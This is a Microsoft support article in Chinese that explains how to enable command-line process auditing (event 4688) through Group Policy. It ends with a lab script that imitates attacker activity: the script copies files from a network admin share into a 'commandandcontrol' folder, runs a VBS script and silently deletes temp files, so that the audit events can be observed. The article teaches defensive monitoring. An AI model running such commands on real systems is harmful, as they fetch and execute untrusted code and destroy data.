命令列程序稽核
作者:Windows 群組資深支援呈核工程師 Justin Turner
注意
本內容由 Microsoft 客戶支援工程師編寫,適用對象為經驗豐富的系統管理員和系統架構師,如果 TechNet 提供的主題已無法滿足您,您要找的是 Windows Server 2012 R2 中功能和解決方案的更深入技術講解,則您是本文的適用對象。 不過,本文未經過相同的編輯階段,因此部分語句也許不如 TechNet 文章那樣洗鍊。
概觀
預先存在的程序建立稽核事件識別碼 4688 現在將會包括命令列程序的稽核資訊。
其也會在 Applocker 事件記錄檔中記錄可執行檔的 SHA1/2 雜湊
- 應用程式及服務記錄檔\Microsoft\Windows\AppLocker
您可以透過 GPO 來啟用,但預設為停用
- 「在程序建立事件中包括命令列」
![醒目提示 [處理命令行] 的螢幕快照。](media/command-line-process-auditing/gtr_adds_event4688.gif)
圖 SEQ 圖 \* ARABIC 16 事件 4688
檢閱 REF _Ref366427278 \h 圖 16 中的已更新事件識別碼 4688。 在此更新之前,不會記錄「程序命令列」的資訊。 因為這個額外的記錄,所以我們現在可以看到,不僅已啟動 wscript.exe 程序,而且也使用其來執行 VB 指令碼。
組態
若要查看此更新的效果,您將需要啟用兩個原則設定。
您必須啟用稽核程序建立稽核,才能查看事件識別碼 4688。
若要啟用稽核程序建立原則,請編輯下列群組原則:
原則位置:電腦設定 > 原則 > Windows 設定 > 安全性設定 > 進階稽核設定 > 詳細追蹤
原則名稱:稽核程序建立
支援平台:Windows 7 和以上版本
描述/說明:
此安全性原則設定可決定作業系統是否會在建立 (啟動) 程序時產生稽核事件,以及建立程序的程序或使用者名稱。
這些稽核事件可協助您瞭解如何使用電腦以及如何追蹤使用者活動。
事件量:低到中,視系統使用量而定
預設值:未設定
若要查看事件識別碼 4688 的新增項目,您必須啟用新的原則設定:在程序建立事件中包括命令列
表格 SEQ 表格 \* ARABIC 19 命令列程序原則設定
| 原則設定 | 詳細資料 |
|---|---|
| 路徑 | 系統管理範本\系統\稽核程序建立 |
| 設定 | 在程序建立事件中包括命令列 |
| 預設設定 | 未設定 (未啟用) |
| 支援平台: | ? |
| 說明 | 此原則設定可決定要在建立新程序時於安全性稽核事件中記錄的資訊。 此設定僅適用於啟用稽核程序建立原則時。 如果您啟用此原則設定,則每個程序的命令列資訊都會以純文字記錄在安全性事件記錄檔中,以作為稽核程序建立事件 4688「已建立新的程序」的一部分,而此安全性事件記錄檔位於套用此原則設定的工作站和伺服器上。 如果您停用或未設定此原則設定,則稽核程序建立事件中將不會包括程序命令列資訊。 預設值:未設定 注意:啟用此原則設定時,任何有權讀取安全性事件的使用者都能夠讀取任何成功建立程序的命令列引數。 命令列引數可以包含敏感性或私人資訊,例如密碼或使用者資料。 |
當您使用 [進階稽核原則設定] 設定時,需要確認基本稽核原則設定未覆寫這些設定。 覆寫設定時,會記錄事件 4719。
![顯示 [在行程建立事件中包含命令行] 對話框的螢幕快照。](media/command-line-process-auditing/gtr_adds_event4719.gif)
下列程序顯示如何透過封鎖任一基本稽核原則設定的套用,以防止發生衝突。
確定未覆寫 [進階稽核原則設定] 設定
開啟 [群組原則管理] 主控台
以滑鼠右鍵按一下 [預設網域原則],然後選取 [編輯]。
依序按兩下 [電腦設定]、[原則] 和 [Windows 設定]。
依序按兩下 [安全性設定] 和 [本機原則],然後選取 [安全性選項]。
按兩下 [稽核: 強制執行稽核原則子類別設定 (Windows Vista 或更新的版本) 以覆寫稽核原則類別設定],然後選取 [定義這個原則設定]。
選取 [啟用],然後選取 [確定]。
其他資源
嘗試:探索命令列程序稽核
啟用「稽核程序建立」事件,並確定不會覆寫進階稽核原則設定
建立可產生一些感興趣事件的指令碼,並執行指令碼。 觀察事件。 課程中用來產生事件的指令碼如下所示:
mkdir c:\systemfiles\temp\commandandcontrol\zone\fifthward copy \\192.168.1.254\c$\hidden c:\systemfiles\temp\hidden\commandandcontrol\zone\fifthward start C:\systemfiles\temp\hidden\commandandcontrol\zone\fifthward\ntuserrights.vbs del c:\systemfiles\temp\*.* /Q啟用命令列程序稽核
執行與之前相同的指令碼並觀察事件